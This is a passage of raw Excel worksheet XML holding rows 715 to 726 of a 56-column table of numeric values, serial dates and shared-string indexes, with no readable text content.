      </c>
      <c r="AQ715" t="s">
        <v>5611</v>
      </c>
      <c r="AR715" t="s">
        <v>5607</v>
      </c>
      <c r="AS715" t="s">
        <v>179</v>
      </c>
      <c r="AT715" t="s">
        <v>72</v>
      </c>
      <c r="AU715">
        <v>25</v>
      </c>
      <c r="AV715">
        <v>1</v>
      </c>
      <c r="AW715">
        <v>4</v>
      </c>
      <c r="AX715">
        <v>0</v>
      </c>
      <c r="AY715">
        <v>6</v>
      </c>
      <c r="AZ715">
        <v>1</v>
      </c>
      <c r="BA715" t="s">
        <v>17257</v>
      </c>
      <c r="BB715" t="s">
        <v>15896</v>
      </c>
      <c r="BC715" t="s">
        <v>9485</v>
      </c>
      <c r="BD715" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="716" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A716">
        <v>2636</v>
      </c>
      <c r="B716" t="s">
        <v>5612</v>
      </c>
      <c r="C716" t="s">
        <v>318</v>
      </c>
      <c r="D716" t="s">
        <v>5613</v>
      </c>
      <c r="E716" t="s">
        <v>363</v>
      </c>
      <c r="F716" t="s">
        <v>5614</v>
      </c>
      <c r="G716" s="1">
        <v>43924</v>
      </c>
      <c r="H716">
        <v>2109</v>
      </c>
      <c r="I716">
        <v>2109</v>
      </c>
      <c r="J716">
        <v>0</v>
      </c>
      <c r="K716">
        <v>0</v>
      </c>
      <c r="L716">
        <v>0</v>
      </c>
      <c r="M716">
        <v>0</v>
      </c>
      <c r="N716">
        <v>0</v>
      </c>
      <c r="O716">
        <v>0</v>
      </c>
      <c r="P716">
        <v>0</v>
      </c>
      <c r="Q716">
        <v>0</v>
      </c>
      <c r="R716">
        <v>0</v>
      </c>
      <c r="S716">
        <v>0</v>
      </c>
      <c r="T716">
        <v>1</v>
      </c>
      <c r="U716">
        <v>0</v>
      </c>
      <c r="V716">
        <v>0</v>
      </c>
      <c r="W716">
        <v>0</v>
      </c>
      <c r="X716">
        <v>0</v>
      </c>
      <c r="Y716">
        <v>0</v>
      </c>
      <c r="Z716">
        <v>0</v>
      </c>
      <c r="AA716">
        <v>0</v>
      </c>
      <c r="AB716">
        <v>0</v>
      </c>
      <c r="AC716">
        <v>0</v>
      </c>
      <c r="AD716">
        <v>0</v>
      </c>
      <c r="AE716">
        <v>800</v>
      </c>
      <c r="AF716" t="s">
        <v>5615</v>
      </c>
      <c r="AG716">
        <v>90234</v>
      </c>
      <c r="AH716">
        <v>26</v>
      </c>
      <c r="AJ716">
        <v>420</v>
      </c>
      <c r="AK716" t="s">
        <v>5616</v>
      </c>
      <c r="AL716" t="s">
        <v>5617</v>
      </c>
      <c r="AM716" t="s">
        <v>5618</v>
      </c>
      <c r="AN716" t="s">
        <v>55</v>
      </c>
      <c r="AO716">
        <v>2017</v>
      </c>
      <c r="AP716">
        <v>81241477775</v>
      </c>
      <c r="AQ716" t="s">
        <v>5619</v>
      </c>
      <c r="AR716" t="s">
        <v>5615</v>
      </c>
      <c r="AS716" t="s">
        <v>553</v>
      </c>
      <c r="AT716" t="s">
        <v>58</v>
      </c>
      <c r="AU716">
        <v>26</v>
      </c>
      <c r="AV716">
        <v>7</v>
      </c>
      <c r="AW716">
        <v>5</v>
      </c>
      <c r="AX716">
        <v>0</v>
      </c>
      <c r="AY716">
        <v>2</v>
      </c>
      <c r="AZ716">
        <v>2</v>
      </c>
      <c r="BA716" t="s">
        <v>17231</v>
      </c>
      <c r="BB716" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC716" t="s">
        <v>10424</v>
      </c>
      <c r="BD716" t="s">
        <v>10425</v>
      </c>
    </row>
    <row r="717" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A717">
        <v>2619</v>
      </c>
      <c r="B717" t="s">
        <v>5620</v>
      </c>
      <c r="C717" t="s">
        <v>189</v>
      </c>
      <c r="D717" t="s">
        <v>5621</v>
      </c>
      <c r="E717" t="s">
        <v>300</v>
      </c>
      <c r="F717" t="s">
        <v>5622</v>
      </c>
      <c r="G717" s="1">
        <v>44081</v>
      </c>
      <c r="H717">
        <v>2130</v>
      </c>
      <c r="I717">
        <v>2130</v>
      </c>
      <c r="J717">
        <v>1</v>
      </c>
      <c r="K717">
        <v>1</v>
      </c>
      <c r="L717">
        <v>1</v>
      </c>
      <c r="M717">
        <v>0</v>
      </c>
      <c r="N717">
        <v>0</v>
      </c>
      <c r="O717">
        <v>0</v>
      </c>
      <c r="P717">
        <v>0</v>
      </c>
      <c r="Q717">
        <v>0</v>
      </c>
      <c r="R717">
        <v>2</v>
      </c>
      <c r="S717">
        <v>0</v>
      </c>
      <c r="T717">
        <v>0</v>
      </c>
      <c r="U717">
        <v>100000</v>
      </c>
      <c r="V717">
        <v>3000</v>
      </c>
      <c r="W717">
        <v>3000</v>
      </c>
      <c r="X717">
        <v>0</v>
      </c>
      <c r="Y717">
        <v>0</v>
      </c>
      <c r="Z717">
        <v>0</v>
      </c>
      <c r="AA717">
        <v>0</v>
      </c>
      <c r="AB717">
        <v>0</v>
      </c>
      <c r="AC717">
        <v>2000</v>
      </c>
      <c r="AD717">
        <v>0</v>
      </c>
      <c r="AE717">
        <v>0</v>
      </c>
      <c r="AF717" t="s">
        <v>5623</v>
      </c>
      <c r="AG717">
        <v>97128</v>
      </c>
      <c r="AH717">
        <v>31</v>
      </c>
      <c r="AJ717">
        <v>461</v>
      </c>
      <c r="AK717" t="s">
        <v>1566</v>
      </c>
      <c r="AL717" t="s">
        <v>5624</v>
      </c>
      <c r="AM717" t="s">
        <v>5625</v>
      </c>
      <c r="AN717" t="s">
        <v>55</v>
      </c>
      <c r="AO717">
        <v>2020</v>
      </c>
      <c r="AP717" t="s">
        <v>5626</v>
      </c>
      <c r="AQ717" t="s">
        <v>5627</v>
      </c>
      <c r="AR717" t="s">
        <v>5628</v>
      </c>
      <c r="AU717">
        <v>20</v>
      </c>
      <c r="AV717">
        <v>1</v>
      </c>
      <c r="AW717">
        <v>5</v>
      </c>
      <c r="AX717">
        <v>5</v>
      </c>
      <c r="AY717">
        <v>3</v>
      </c>
      <c r="AZ717">
        <v>2</v>
      </c>
      <c r="BA717" t="s">
        <v>17213</v>
      </c>
      <c r="BB717">
        <v>0</v>
      </c>
      <c r="BC717" t="s">
        <v>11278</v>
      </c>
      <c r="BD717" t="s">
        <v>11280</v>
      </c>
    </row>
    <row r="718" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A718">
        <v>2639</v>
      </c>
      <c r="B718" t="s">
        <v>5629</v>
      </c>
      <c r="C718" t="s">
        <v>2848</v>
      </c>
      <c r="D718" t="s">
        <v>5630</v>
      </c>
      <c r="E718" t="s">
        <v>142</v>
      </c>
      <c r="F718" t="s">
        <v>5631</v>
      </c>
      <c r="G718" s="1">
        <v>43882</v>
      </c>
      <c r="H718">
        <v>2134</v>
      </c>
      <c r="I718">
        <v>2134</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t="s">
        <v>5632</v>
      </c>
      <c r="AG718">
        <v>30257</v>
      </c>
      <c r="AH718">
        <v>9</v>
      </c>
      <c r="AJ718">
        <v>112</v>
      </c>
      <c r="AK718" t="s">
        <v>4273</v>
      </c>
      <c r="AL718" t="s">
        <v>5633</v>
      </c>
      <c r="AM718" t="s">
        <v>5634</v>
      </c>
      <c r="AN718" t="s">
        <v>68</v>
      </c>
      <c r="AO718">
        <v>2019</v>
      </c>
      <c r="AP718" t="s">
        <v>5635</v>
      </c>
      <c r="AQ718" t="s">
        <v>5636</v>
      </c>
      <c r="AR718" t="s">
        <v>5632</v>
      </c>
      <c r="AS718" t="s">
        <v>71</v>
      </c>
      <c r="AT718" t="s">
        <v>72</v>
      </c>
      <c r="AU718">
        <v>30</v>
      </c>
      <c r="AV718">
        <v>0</v>
      </c>
      <c r="AW718">
        <v>7</v>
      </c>
      <c r="AX718">
        <v>0</v>
      </c>
      <c r="AY718">
        <v>6</v>
      </c>
      <c r="AZ718">
        <v>0</v>
      </c>
      <c r="BA718" t="s">
        <v>17232</v>
      </c>
      <c r="BB718" t="s">
        <v>15891</v>
      </c>
      <c r="BC718" t="s">
        <v>10448</v>
      </c>
      <c r="BD718">
        <v>0</v>
      </c>
    </row>
    <row r="719" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A719">
        <v>2610</v>
      </c>
      <c r="B719" t="s">
        <v>5637</v>
      </c>
      <c r="C719" t="s">
        <v>47</v>
      </c>
      <c r="D719" t="s">
        <v>5638</v>
      </c>
      <c r="E719" t="s">
        <v>644</v>
      </c>
      <c r="F719" t="s">
        <v>5639</v>
      </c>
      <c r="G719" s="1">
        <v>43914</v>
      </c>
      <c r="H719">
        <v>2148</v>
      </c>
      <c r="I719">
        <v>2148</v>
      </c>
      <c r="J719">
        <v>0</v>
      </c>
      <c r="K719">
        <v>0</v>
      </c>
      <c r="L719">
        <v>0</v>
      </c>
      <c r="M719">
        <v>0</v>
      </c>
      <c r="N719">
        <v>0</v>
      </c>
      <c r="O719">
        <v>0</v>
      </c>
      <c r="P719">
        <v>0</v>
      </c>
      <c r="Q719">
        <v>1</v>
      </c>
      <c r="R719">
        <v>3</v>
      </c>
      <c r="S719">
        <v>1</v>
      </c>
      <c r="T719">
        <v>1</v>
      </c>
      <c r="U719">
        <v>0</v>
      </c>
      <c r="V719">
        <v>0</v>
      </c>
      <c r="W719">
        <v>0</v>
      </c>
      <c r="X719">
        <v>0</v>
      </c>
      <c r="Y719">
        <v>0</v>
      </c>
      <c r="Z719">
        <v>0</v>
      </c>
      <c r="AA719">
        <v>0</v>
      </c>
      <c r="AB719">
        <v>0</v>
      </c>
      <c r="AC719">
        <v>0</v>
      </c>
      <c r="AD719">
        <v>1</v>
      </c>
      <c r="AE719">
        <v>5000</v>
      </c>
      <c r="AF719" t="s">
        <v>5640</v>
      </c>
      <c r="AG719">
        <v>20123</v>
      </c>
      <c r="AH719">
        <v>2</v>
      </c>
      <c r="AJ719">
        <v>53</v>
      </c>
      <c r="AK719" t="s">
        <v>5641</v>
      </c>
      <c r="AL719" t="s">
        <v>5642</v>
      </c>
      <c r="AM719" t="s">
        <v>5643</v>
      </c>
      <c r="AN719" t="s">
        <v>55</v>
      </c>
      <c r="AO719">
        <v>2013</v>
      </c>
      <c r="AP719">
        <v>85275520628</v>
      </c>
      <c r="AQ719" t="s">
        <v>5644</v>
      </c>
      <c r="AR719" t="s">
        <v>5640</v>
      </c>
      <c r="AS719" t="s">
        <v>57</v>
      </c>
      <c r="AT719" t="s">
        <v>58</v>
      </c>
      <c r="AU719">
        <v>26</v>
      </c>
      <c r="AV719">
        <v>0</v>
      </c>
      <c r="AW719">
        <v>0</v>
      </c>
      <c r="AX719">
        <v>0</v>
      </c>
      <c r="AY719">
        <v>3</v>
      </c>
      <c r="AZ719">
        <v>0</v>
      </c>
      <c r="BA719" t="s">
        <v>16989</v>
      </c>
      <c r="BB719" t="s">
        <v>15898</v>
      </c>
      <c r="BC719" t="s">
        <v>9603</v>
      </c>
      <c r="BD719" t="s">
        <v>10665</v>
      </c>
    </row>
    <row r="720" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A720">
        <v>1957</v>
      </c>
      <c r="B720" t="s">
        <v>5645</v>
      </c>
      <c r="C720" t="s">
        <v>224</v>
      </c>
      <c r="D720" t="s">
        <v>5646</v>
      </c>
      <c r="E720" t="s">
        <v>49</v>
      </c>
      <c r="F720" t="s">
        <v>5647</v>
      </c>
      <c r="G720" s="1">
        <v>43893</v>
      </c>
      <c r="H720">
        <v>2150</v>
      </c>
      <c r="I720">
        <v>2150</v>
      </c>
      <c r="J720">
        <v>0</v>
      </c>
      <c r="K720">
        <v>0</v>
      </c>
      <c r="L720">
        <v>0</v>
      </c>
      <c r="M720">
        <v>0</v>
      </c>
      <c r="N720">
        <v>0</v>
      </c>
      <c r="O720">
        <v>0</v>
      </c>
      <c r="P720">
        <v>0</v>
      </c>
      <c r="Q720">
        <v>1</v>
      </c>
      <c r="R720">
        <v>0</v>
      </c>
      <c r="S720">
        <v>0</v>
      </c>
      <c r="T720">
        <v>1</v>
      </c>
      <c r="U720">
        <v>0</v>
      </c>
      <c r="V720">
        <v>0</v>
      </c>
      <c r="W720">
        <v>0</v>
      </c>
      <c r="X720">
        <v>0</v>
      </c>
      <c r="Y720">
        <v>0</v>
      </c>
      <c r="Z720">
        <v>0</v>
      </c>
      <c r="AA720">
        <v>0</v>
      </c>
      <c r="AB720">
        <v>50</v>
      </c>
      <c r="AC720">
        <v>0</v>
      </c>
      <c r="AD720">
        <v>0</v>
      </c>
      <c r="AE720">
        <v>100</v>
      </c>
      <c r="AF720" t="s">
        <v>5648</v>
      </c>
      <c r="AG720">
        <v>0</v>
      </c>
      <c r="AH720">
        <v>15</v>
      </c>
      <c r="AJ720">
        <v>224</v>
      </c>
      <c r="AK720" t="s">
        <v>5649</v>
      </c>
      <c r="AL720" t="s">
        <v>5650</v>
      </c>
      <c r="AM720" t="s">
        <v>5651</v>
      </c>
      <c r="AN720" t="s">
        <v>68</v>
      </c>
      <c r="AO720">
        <v>2013</v>
      </c>
      <c r="AP720">
        <v>87738133735</v>
      </c>
      <c r="AQ720" t="s">
        <v>5652</v>
      </c>
      <c r="AR720" t="s">
        <v>5648</v>
      </c>
      <c r="AS720" t="s">
        <v>71</v>
      </c>
      <c r="AT720" t="s">
        <v>72</v>
      </c>
      <c r="AU720">
        <v>6</v>
      </c>
      <c r="AV720">
        <v>1</v>
      </c>
      <c r="AW720">
        <v>0</v>
      </c>
      <c r="AX720">
        <v>0</v>
      </c>
      <c r="AY720">
        <v>1</v>
      </c>
      <c r="AZ720">
        <v>4</v>
      </c>
      <c r="BA720" t="s">
        <v>17264</v>
      </c>
      <c r="BB720" t="s">
        <v>15897</v>
      </c>
      <c r="BC720" t="s">
        <v>9867</v>
      </c>
      <c r="BD720">
        <v>0</v>
      </c>
    </row>
    <row r="721" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A721">
        <v>2676</v>
      </c>
      <c r="B721" t="s">
        <v>5653</v>
      </c>
      <c r="C721" t="s">
        <v>88</v>
      </c>
      <c r="D721" t="s">
        <v>5654</v>
      </c>
      <c r="E721" t="s">
        <v>111</v>
      </c>
      <c r="F721" t="s">
        <v>5655</v>
      </c>
      <c r="G721" s="1">
        <v>44071</v>
      </c>
      <c r="H721">
        <v>2157</v>
      </c>
      <c r="I721">
        <v>2157</v>
      </c>
      <c r="J721">
        <v>3</v>
      </c>
      <c r="K721">
        <v>1</v>
      </c>
      <c r="L721">
        <v>1</v>
      </c>
      <c r="M721">
        <v>0</v>
      </c>
      <c r="N721">
        <v>0</v>
      </c>
      <c r="O721">
        <v>1</v>
      </c>
      <c r="P721">
        <v>0</v>
      </c>
      <c r="Q721">
        <v>0</v>
      </c>
      <c r="R721">
        <v>1</v>
      </c>
      <c r="S721">
        <v>0</v>
      </c>
      <c r="T721">
        <v>0</v>
      </c>
      <c r="U721">
        <v>70000</v>
      </c>
      <c r="V721">
        <v>6000</v>
      </c>
      <c r="W721">
        <v>6000</v>
      </c>
      <c r="X721">
        <v>0</v>
      </c>
      <c r="Y721">
        <v>0</v>
      </c>
      <c r="Z721">
        <v>2000</v>
      </c>
      <c r="AA721">
        <v>0</v>
      </c>
      <c r="AB721">
        <v>0</v>
      </c>
      <c r="AC721">
        <v>3000</v>
      </c>
      <c r="AD721">
        <v>0</v>
      </c>
      <c r="AE721">
        <v>0</v>
      </c>
      <c r="AF721" t="s">
        <v>5656</v>
      </c>
      <c r="AG721">
        <v>80222</v>
      </c>
      <c r="AH721">
        <v>17</v>
      </c>
      <c r="AJ721">
        <v>282</v>
      </c>
      <c r="AK721" t="s">
        <v>693</v>
      </c>
      <c r="AL721" t="s">
        <v>602</v>
      </c>
      <c r="AM721" t="s">
        <v>5657</v>
      </c>
      <c r="AN721" t="s">
        <v>55</v>
      </c>
      <c r="AO721">
        <v>1994</v>
      </c>
      <c r="AP721" t="s">
        <v>5658</v>
      </c>
      <c r="AQ721" t="s">
        <v>5659</v>
      </c>
      <c r="AR721" t="s">
        <v>5660</v>
      </c>
      <c r="AS721" t="s">
        <v>71</v>
      </c>
      <c r="AT721" t="s">
        <v>58</v>
      </c>
      <c r="AU721">
        <v>0</v>
      </c>
      <c r="AV721">
        <v>0</v>
      </c>
      <c r="AW721">
        <v>0</v>
      </c>
      <c r="AX721">
        <v>0</v>
      </c>
      <c r="AY721">
        <v>35</v>
      </c>
      <c r="AZ721">
        <v>28</v>
      </c>
      <c r="BA721" t="s">
        <v>17260</v>
      </c>
      <c r="BB721" t="s">
        <v>15923</v>
      </c>
      <c r="BC721">
        <v>0</v>
      </c>
      <c r="BD721" t="s">
        <v>10522</v>
      </c>
    </row>
    <row r="722" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A722">
        <v>2671</v>
      </c>
      <c r="B722" t="s">
        <v>5661</v>
      </c>
      <c r="C722" t="s">
        <v>129</v>
      </c>
      <c r="D722" t="s">
        <v>5662</v>
      </c>
      <c r="E722" t="s">
        <v>49</v>
      </c>
      <c r="F722" t="s">
        <v>5663</v>
      </c>
      <c r="G722" s="1">
        <v>44105</v>
      </c>
      <c r="H722">
        <v>2161</v>
      </c>
      <c r="I722">
        <v>2161</v>
      </c>
      <c r="J722">
        <v>0</v>
      </c>
      <c r="K722">
        <v>0</v>
      </c>
      <c r="L722">
        <v>0</v>
      </c>
      <c r="M722">
        <v>2</v>
      </c>
      <c r="N722">
        <v>0</v>
      </c>
      <c r="O722">
        <v>0</v>
      </c>
      <c r="P722">
        <v>0</v>
      </c>
      <c r="Q722">
        <v>1</v>
      </c>
      <c r="R722">
        <v>8</v>
      </c>
      <c r="S722">
        <v>0</v>
      </c>
      <c r="T722">
        <v>0</v>
      </c>
      <c r="U722">
        <v>0</v>
      </c>
      <c r="V722">
        <v>0</v>
      </c>
      <c r="W722">
        <v>0</v>
      </c>
      <c r="X722">
        <v>200</v>
      </c>
      <c r="Y722">
        <v>0</v>
      </c>
      <c r="Z722">
        <v>0</v>
      </c>
      <c r="AA722">
        <v>0</v>
      </c>
      <c r="AB722">
        <v>1000</v>
      </c>
      <c r="AC722">
        <v>8000</v>
      </c>
      <c r="AD722">
        <v>0</v>
      </c>
      <c r="AE722">
        <v>0</v>
      </c>
      <c r="AF722" t="s">
        <v>5664</v>
      </c>
      <c r="AG722">
        <v>15211</v>
      </c>
      <c r="AH722">
        <v>11</v>
      </c>
      <c r="AJ722">
        <v>268</v>
      </c>
      <c r="AK722" t="s">
        <v>252</v>
      </c>
      <c r="AL722" t="s">
        <v>253</v>
      </c>
      <c r="AM722" t="s">
        <v>5665</v>
      </c>
      <c r="AN722" t="s">
        <v>55</v>
      </c>
      <c r="AO722">
        <v>2016</v>
      </c>
      <c r="AP722" t="s">
        <v>5666</v>
      </c>
      <c r="AQ722">
        <v>82155845308</v>
      </c>
      <c r="AR722" t="s">
        <v>5667</v>
      </c>
      <c r="AS722" t="s">
        <v>57</v>
      </c>
      <c r="AT722" t="s">
        <v>58</v>
      </c>
      <c r="AU722">
        <v>26</v>
      </c>
      <c r="AV722">
        <v>2</v>
      </c>
      <c r="AW722">
        <v>2</v>
      </c>
      <c r="AX722">
        <v>0</v>
      </c>
      <c r="AY722">
        <v>2</v>
      </c>
      <c r="AZ722">
        <v>2</v>
      </c>
      <c r="BA722" t="s">
        <v>16767</v>
      </c>
      <c r="BB722" t="s">
        <v>15894</v>
      </c>
      <c r="BC722" t="s">
        <v>10504</v>
      </c>
      <c r="BD722" t="s">
        <v>10505</v>
      </c>
    </row>
    <row r="723" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A723">
        <v>2098</v>
      </c>
      <c r="B723" t="s">
        <v>5668</v>
      </c>
      <c r="C723" t="s">
        <v>157</v>
      </c>
      <c r="D723" t="s">
        <v>5669</v>
      </c>
      <c r="E723" t="s">
        <v>363</v>
      </c>
      <c r="F723" t="s">
        <v>5670</v>
      </c>
      <c r="G723" s="1">
        <v>44117</v>
      </c>
      <c r="H723">
        <v>2211</v>
      </c>
      <c r="I723">
        <v>2211</v>
      </c>
      <c r="J723">
        <v>0</v>
      </c>
      <c r="K723">
        <v>2</v>
      </c>
      <c r="L723">
        <v>0</v>
      </c>
      <c r="M723">
        <v>0</v>
      </c>
      <c r="N723">
        <v>0</v>
      </c>
      <c r="O723">
        <v>0</v>
      </c>
      <c r="P723">
        <v>0</v>
      </c>
      <c r="Q723">
        <v>0</v>
      </c>
      <c r="R723">
        <v>0</v>
      </c>
      <c r="S723">
        <v>0</v>
      </c>
      <c r="T723">
        <v>1</v>
      </c>
      <c r="U723">
        <v>0</v>
      </c>
      <c r="V723">
        <v>40</v>
      </c>
      <c r="W723">
        <v>0</v>
      </c>
      <c r="X723">
        <v>0</v>
      </c>
      <c r="Y723">
        <v>0</v>
      </c>
      <c r="Z723">
        <v>0</v>
      </c>
      <c r="AA723">
        <v>0</v>
      </c>
      <c r="AB723">
        <v>0</v>
      </c>
      <c r="AC723">
        <v>0</v>
      </c>
      <c r="AD723">
        <v>0</v>
      </c>
      <c r="AE723">
        <v>20</v>
      </c>
      <c r="AF723" t="s">
        <v>5671</v>
      </c>
      <c r="AG723">
        <v>60186</v>
      </c>
      <c r="AH723">
        <v>16</v>
      </c>
      <c r="AJ723">
        <v>264</v>
      </c>
      <c r="AK723" t="s">
        <v>5672</v>
      </c>
      <c r="AL723" t="s">
        <v>5672</v>
      </c>
      <c r="AM723" t="s">
        <v>5673</v>
      </c>
      <c r="AN723" t="s">
        <v>55</v>
      </c>
      <c r="AO723">
        <v>1999</v>
      </c>
      <c r="AP723">
        <v>8123505850</v>
      </c>
      <c r="AQ723" t="s">
        <v>5674</v>
      </c>
      <c r="AR723" t="s">
        <v>5671</v>
      </c>
      <c r="AS723" t="s">
        <v>71</v>
      </c>
      <c r="AT723" t="s">
        <v>58</v>
      </c>
      <c r="AU723">
        <v>28</v>
      </c>
      <c r="AV723">
        <v>1</v>
      </c>
      <c r="AW723">
        <v>0</v>
      </c>
      <c r="AX723">
        <v>0</v>
      </c>
      <c r="AY723">
        <v>4</v>
      </c>
      <c r="AZ723">
        <v>4</v>
      </c>
      <c r="BA723" t="s">
        <v>17064</v>
      </c>
      <c r="BB723" t="s">
        <v>15697</v>
      </c>
      <c r="BC723" t="s">
        <v>11821</v>
      </c>
      <c r="BD723" t="s">
        <v>11822</v>
      </c>
    </row>
    <row r="724" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A724">
        <v>2054</v>
      </c>
      <c r="B724" t="s">
        <v>5675</v>
      </c>
      <c r="C724" t="s">
        <v>2760</v>
      </c>
      <c r="D724" t="s">
        <v>5676</v>
      </c>
      <c r="E724" t="s">
        <v>142</v>
      </c>
      <c r="F724" t="s">
        <v>5677</v>
      </c>
      <c r="G724" s="1">
        <v>44200</v>
      </c>
      <c r="H724">
        <v>2215</v>
      </c>
      <c r="I724">
        <v>2215</v>
      </c>
      <c r="J724">
        <v>0</v>
      </c>
      <c r="K724">
        <v>1</v>
      </c>
      <c r="L724">
        <v>0</v>
      </c>
      <c r="M724">
        <v>0</v>
      </c>
      <c r="N724">
        <v>0</v>
      </c>
      <c r="O724">
        <v>0</v>
      </c>
      <c r="P724">
        <v>0</v>
      </c>
      <c r="Q724">
        <v>0</v>
      </c>
      <c r="R724">
        <v>0</v>
      </c>
      <c r="S724">
        <v>0</v>
      </c>
      <c r="T724">
        <v>0</v>
      </c>
      <c r="U724">
        <v>0</v>
      </c>
      <c r="V724">
        <v>20000</v>
      </c>
      <c r="W724">
        <v>0</v>
      </c>
      <c r="X724">
        <v>0</v>
      </c>
      <c r="Y724">
        <v>0</v>
      </c>
      <c r="Z724">
        <v>0</v>
      </c>
      <c r="AA724">
        <v>0</v>
      </c>
      <c r="AB724">
        <v>0</v>
      </c>
      <c r="AC724">
        <v>0</v>
      </c>
      <c r="AD724">
        <v>0</v>
      </c>
      <c r="AE724">
        <v>0</v>
      </c>
      <c r="AF724" t="s">
        <v>5678</v>
      </c>
      <c r="AG724">
        <v>83237</v>
      </c>
      <c r="AH724">
        <v>18</v>
      </c>
      <c r="AJ724">
        <v>291</v>
      </c>
      <c r="AK724" t="s">
        <v>5679</v>
      </c>
      <c r="AL724" t="s">
        <v>5680</v>
      </c>
      <c r="AM724" t="s">
        <v>5681</v>
      </c>
      <c r="AN724" t="s">
        <v>55</v>
      </c>
      <c r="AO724">
        <v>2019</v>
      </c>
      <c r="AP724" t="s">
        <v>5682</v>
      </c>
      <c r="AQ724" t="s">
        <v>5683</v>
      </c>
      <c r="AR724" t="s">
        <v>5678</v>
      </c>
      <c r="AS724" t="s">
        <v>179</v>
      </c>
      <c r="AT724" t="s">
        <v>58</v>
      </c>
      <c r="AU724">
        <v>25</v>
      </c>
      <c r="AV724">
        <v>0</v>
      </c>
      <c r="AW724">
        <v>0</v>
      </c>
      <c r="AX724">
        <v>0</v>
      </c>
      <c r="AY724">
        <v>2</v>
      </c>
      <c r="AZ724">
        <v>2</v>
      </c>
      <c r="BA724" t="s">
        <v>17049</v>
      </c>
      <c r="BB724" t="s">
        <v>15634</v>
      </c>
      <c r="BC724" t="s">
        <v>10494</v>
      </c>
      <c r="BD724">
        <v>0</v>
      </c>
    </row>
    <row r="725" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A725">
        <v>2649</v>
      </c>
      <c r="B725" t="s">
        <v>1035</v>
      </c>
      <c r="C725" t="s">
        <v>74</v>
      </c>
      <c r="D725" t="s">
        <v>5684</v>
      </c>
      <c r="E725" t="s">
        <v>412</v>
      </c>
      <c r="F725" t="s">
        <v>5685</v>
      </c>
      <c r="G725" s="1">
        <v>44048</v>
      </c>
      <c r="H725">
        <v>2241</v>
      </c>
      <c r="I725">
        <v>2241</v>
      </c>
      <c r="J725">
        <v>2</v>
      </c>
      <c r="K725">
        <v>1</v>
      </c>
      <c r="L725">
        <v>1</v>
      </c>
      <c r="M725">
        <v>0</v>
      </c>
      <c r="N725">
        <v>0</v>
      </c>
      <c r="O725">
        <v>0</v>
      </c>
      <c r="P725">
        <v>0</v>
      </c>
      <c r="Q725">
        <v>4</v>
      </c>
      <c r="R725">
        <v>2</v>
      </c>
      <c r="S725">
        <v>0</v>
      </c>
      <c r="T725">
        <v>1</v>
      </c>
      <c r="U725">
        <v>50000</v>
      </c>
      <c r="V725">
        <v>1</v>
      </c>
      <c r="W725">
        <v>2500</v>
      </c>
      <c r="X725">
        <v>0</v>
      </c>
      <c r="Y725">
        <v>0</v>
      </c>
      <c r="Z725">
        <v>0</v>
      </c>
      <c r="AA725">
        <v>0</v>
      </c>
      <c r="AB725">
        <v>10</v>
      </c>
      <c r="AC725">
        <v>600</v>
      </c>
      <c r="AD725">
        <v>0</v>
      </c>
      <c r="AE725">
        <v>2000</v>
      </c>
      <c r="AF725" t="s">
        <v>2131</v>
      </c>
      <c r="AG725">
        <v>59252</v>
      </c>
      <c r="AH725">
        <v>14</v>
      </c>
      <c r="AJ725">
        <v>204</v>
      </c>
      <c r="AK725" t="s">
        <v>1556</v>
      </c>
      <c r="AL725" t="s">
        <v>1939</v>
      </c>
      <c r="AM725" t="s">
        <v>5686</v>
      </c>
      <c r="AN725" t="s">
        <v>55</v>
      </c>
      <c r="AO725">
        <v>1999</v>
      </c>
      <c r="AP725" t="s">
        <v>5687</v>
      </c>
      <c r="AQ725" t="s">
        <v>5688</v>
      </c>
      <c r="AR725" t="s">
        <v>5689</v>
      </c>
      <c r="AS725" t="s">
        <v>371</v>
      </c>
      <c r="AT725" t="s">
        <v>72</v>
      </c>
      <c r="AU725">
        <v>26</v>
      </c>
      <c r="AV725">
        <v>1</v>
      </c>
      <c r="AW725">
        <v>5</v>
      </c>
      <c r="AX725">
        <v>98</v>
      </c>
      <c r="AY725">
        <v>15</v>
      </c>
      <c r="AZ725">
        <v>3</v>
      </c>
      <c r="BA725" t="s">
        <v>16677</v>
      </c>
      <c r="BB725" t="s">
        <v>15890</v>
      </c>
      <c r="BC725">
        <v>0</v>
      </c>
      <c r="BD725" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="726" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A726">
        <v>2605</v>
      </c>
      <c r="B726" t="s">
        <v>5690</v>
      </c>
      <c r="C726" t="s">
        <v>129</v>
      </c>
      <c r="D726" t="s">
        <v>5691</v>
      </c>
      <c r="E726" t="s">
        <v>300</v>
      </c>
      <c r="F726" t="s">
        <v>5692</v>
      </c>
      <c r="G726" s="1">
        <v>43949</v>
      </c>
      <c r="H726">
        <v>2256</v>
      </c>
      <c r="I726">
        <v>2256</v>
      </c>
      <c r="J726">
        <v>1</v>
      </c>
      <c r="K726">
        <v>0</v>
      </c>
      <c r="L726">
        <v>1</v>
      </c>
      <c r="M726">
        <v>0</v>
      </c>
      <c r="N726">
        <v>0</v>
      </c>
      <c r="O726">
        <v>0</v>
      </c>
      <c r="P726">
        <v>0</v>
      </c>
      <c r="Q726">
        <v>0</v>
      </c>
      <c r="R726">
        <v>0</v>
      </c>
      <c r="S726">
        <v>0</v>
      </c>
      <c r="T726">
        <v>0</v>
      </c>
      <c r="U726">
        <v>7000</v>
      </c>
      <c r="V726">
        <v>0</v>
      </c>
      <c r="W726">
        <v>1000</v>
      </c>
      <c r="X726">
        <v>0</v>
      </c>
      <c r="Y726">
        <v>0</v>
      </c>
      <c r="Z726">
        <v>0</v>
      </c>
      <c r="AA726">
        <v>0</v>
      </c>
      <c r="AB726">
        <v>0</v>
      </c>
      <c r="AC726">
        <v>0</v>
      </c>
      <c r="AD726">
        <v>0</v>
      </c>
      <c r="AE726">
        <v>0</v>
      </c>
      <c r="AF726" t="s">
        <v>5693</v>
      </c>
      <c r="AG726">
        <v>15211</v>
      </c>
      <c r="AH726">
        <v>11</v>
      </c>
      <c r="AJ726">
